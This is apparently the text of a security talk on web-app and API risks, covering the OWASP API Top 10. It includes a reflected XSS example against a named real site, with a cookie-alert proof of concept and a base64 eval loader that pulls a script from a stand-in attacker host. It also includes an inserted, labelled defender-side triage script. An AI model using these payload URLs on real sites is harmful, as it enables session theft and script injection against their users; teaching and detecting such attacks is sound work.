www.char49.com
TRUE SECURITY

Web Apps: APIs’ Nightmare
Who Am I

Paulo Silva
● Security Researcher/Pentester
● 15+ years as a Software Developer
● Long-term OWASP Volunteer
● Strong believer in spreading security awareness

@pauloasilva_com
/devpauloasilva
paulo@char49.com
Image source: https://home.cern/science/computing/birth-web
Traditional Web Applications

Client <-> Server, over HTTP. Server side: PHP, Database.

Server files:
  scripts/  main.js . . .
  style/    display.js . . .
  images/   background.js . . .
  php/      index.php, login.php . . .

Requests:
  GET /                    Content-Type: text/html
  GET /scripts/main.js     Content-Type: application/javascript
  GET /style/display.css   Content-Type: text/css
  ...
  GET /login.php           Content-Type: text/html
  POST /login.php          Content-Type: text/html
Mobile Applications

Client <-> Server, over HTTP. Server side: PHP, Database.

Server files:
  php/  auth.php, users.php, posts.php, comments.php . . .

Requests:
  POST /login       Content-Type: application/json
  GET /users/me     Content-Type: application/json
  GET /posts/       Content-Type: application/json
  ...
Connected Things (Internet of Things)

Client <-> Server, over HTTP. Server side: API 1, API 2, API 3 ... API N, backed by DB 1, DB 2, 3rd Party APIs, and Service 1, Service 2, Service 3, Service 4 ... Service N.

Requests:
  GET /device/config   Content-Type: application/json
  POST /device/auth    Content-Type: application/json
  POST /location       Content-Type: application/json
  ...
Modern Web Applications

Client <-> Server, over HTTP. Server side: API 1, API 2, API 3 ... API N, backed by DB 1, DB 2, 3rd Party APIs, and Service 1, Service 2, Service 3, Service 4 ... Service N.

Server files:
  public/  index.html, bundle.js ...

Requests:
  GET /               Content-Type: text/html
  GET /bundle.js      Content-Type: application/javascript
  POST /login         Content-Type: application/json
  ...
  GET /places/1234    Content-Type: application/json
  ...
OWASP API Security Top 10

API1:2023 Broken Object-Level Authorization
API2:2023 Broken Authentication
API3:2023 Broken Object Property Level Authorization
API4:2023 Unrestricted Resource Consumption
API5:2023 Broken Function-Level Authorization
API6:2023 Unrestricted Access to Sensitive Business Flows
API7:2023 Server Side Request Forgery
API8:2023 Security Misconfiguration
API9:2023 Improper Inventory Management
API10:2023 Unsafe Consumption of APIs
Cross-Site Scripting

Vulnerable parameter: ke. Its value is reflected into the response as HTML, so markup supplied in the query string is rendered by the browser:
https://campaigns.porsche.com/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D80037659B111&ke=6546546<img src=x onerror=alert(document.cookie)>

Loader / Payload

The same parameter, with the alert() proof of concept replaced by a two-stage construction:
https://campaigns.porsche.com/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D80037659B111&ke=6546546<img src=x onerror=eval(atob(“KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID0gJ2h0dHBzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==”))>

Loader: the injected <img src=x onerror=...> element. The image source cannot load, so the onerror handler runs.
Payload: the base64 string handed to atob() and eval(). It decodes to a few lines of JavaScript that append a <script> element pointing at an external host, so the malicious script itself never appears in the URL and is fetched at run time.

Malicious Script
HTTP Fundamentals
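Added here as an example (not code from the slides or from their author): a defender-side triage helper for the loader/payload construction above. It assumes Node.js (Buffer) with a browser atob() fallback; SAMPLE_B64 and SAMPLE_URL are the slide's own values rejoined across the slide's line breaks, and every other name (triage, parseQuery, the regexes) is this example's.

```javascript
// Added example (not from the slides): defender-side triage of a request URL
// that carries a reflected-XSS loader like the one above. It flags query
// parameters whose value contains markup, extracts inline event handlers and,
// when a handler has the eval(atob("...")) shape, decodes the second stage and
// lists the hosts it references, so an analyst sees what would have been loaded.

// The slide's base64 payload, rejoined across the slide's line breaks.
const SAMPLE_B64 =
  "KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsK" +
  "ICBzY3JpcHQuc3JjID0gJ2h0dHBzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3Vt" +
  "ZW50LmJvZHkuYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==";

// The slide's request (loader variant), with straight quotes around the base64
// where the slide shows typographic ones.
const SAMPLE_URL =
  "https://campaigns.porsche.com/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen" +
  "&pid=95998FB59237DF92C12586D80037659B111" +
  `&ke=6546546<img src=x onerror=eval(atob("${SAMPLE_B64}"))>`;

const TAG_RE = /<\s*[a-z][\w-]*\b[^>]*>/i;                                // any HTML start tag
const HANDLER_RE = /\bon[a-z]+\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi; // on*= handlers
// eval(atob("...")) loader shape; straight and typographic quotes both accepted.
const ATOB_RE = /atob\(\s*["'\u201c\u201d]([A-Za-z0-9+/=]+)["'\u201c\u201d]\s*\)/;
const URL_RE = /https?:\/\/[^\s'"`<>)]+/g;

// Split the raw query by hand. URLSearchParams would turn '+' into ' ' and
// corrupt base64 that contains it (this payload does: "ID0+"), and the split
// must be on the FIRST '=' only, because base64 padding is '=' as well.
function parseQuery(url) {
  const qi = url.indexOf("?");
  const query = qi === -1 ? "" : url.slice(qi + 1);
  const params = [];
  for (const part of query.split("&")) {
    if (part === "") continue;
    const eq = part.indexOf("=");
    const name = eq === -1 ? part : part.slice(0, eq);
    const raw = eq === -1 ? "" : part.slice(eq + 1);
    let value;
    try { value = decodeURIComponent(raw); } catch { value = raw; } // bad %xx: keep raw
    params.push({ name, value });
  }
  return params;
}

function base64Decode(b64) {
  return typeof Buffer !== "undefined"
    ? Buffer.from(b64, "base64").toString("utf8")
    : atob(b64); // browser fallback
}

// One finding per parameter whose value carries markup.
function triage(url) {
  const findings = [];
  for (const { name, value } of parseQuery(url)) {
    if (!TAG_RE.test(value)) continue;
    const finding = { param: name, handlers: [], secondStage: null, hosts: [] };
    for (const m of value.matchAll(HANDLER_RE)) {
      finding.handlers.push(m[1] ?? m[2] ?? m[3]);
    }
    for (const handler of finding.handlers) {
      const b = ATOB_RE.exec(handler);
      if (!b) continue;
      finding.secondStage = base64Decode(b[1]);
      const urls = finding.secondStage.match(URL_RE) || [];
      finding.hosts = [...new Set(urls.map((u) => new URL(u).host))];
    }
    findings.push(finding);
  }
  return findings;
}

console.log(JSON.stringify(triage(SAMPLE_URL), null, 2));
```

Run against the slide's URL it reports one finding on ke, the decoded second stage, and the single external host that stage would contact.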
OWASP Resources
● OWASP API Security Project
● OWASP API Security Top 10 2023
● OWASP API Security Top 10 2019
● Goats
  ● OWASP Vulnerable Web Applications Directory
  ● OWASP crAPI - Completely Ridiculous API
  ● OWASP Juice Shop
● OWASP Cheat Sheets Series
  ● Authentication Cheat Sheet
  ● Authorization Cheat Sheet
  ● GraphQL Cheat Sheet
  ● REST Security Cheat Sheet
  ● Web Service Security Cheat Sheet
● OWASP Secure Coding Practices-Quick Reference Guide
● OWASP Go Secure Coding Practices Guide

Other References
● HTTP
  ● Basics of HTTP - mdn web docs
  ● Cross-Origin Resource Sharing (CORS) - mdn web docs
● API Protocols
  ● REST
    ● Representational state transfer - Wikipedia
    ● Representational State Transfer (REST) - Fielding Dissertation
  ● RPC
    ● Remote procedure call - Wikipedia
    ● OpenRPC
    ● JSON-RPC
    ● XML-RPC
    ● gRPC
  ● GraphQL
    ● Introduction to GraphQL
    ● GraphQL blogposts Series - Checkmarx
    ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify
● MindAPI
  ● MindAPI References
www.char49.com
Thank You!
